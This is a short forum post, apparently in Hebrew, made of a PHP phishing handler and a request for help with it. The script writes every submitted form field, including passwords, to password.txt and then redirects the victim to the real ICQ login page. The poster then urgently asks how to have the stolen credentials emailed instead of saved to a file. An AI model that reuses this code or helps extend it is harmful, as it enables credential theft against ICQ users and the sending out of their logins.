קוד:
<?php
header("Location: https://icq.com/karma/login_page.php");
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
מה הבעיה פה?
יש בעיה בכלל?
איך אני עושה שבמקום שזה ישלח לקובץ זה יישלח לאימייל ?
דחוף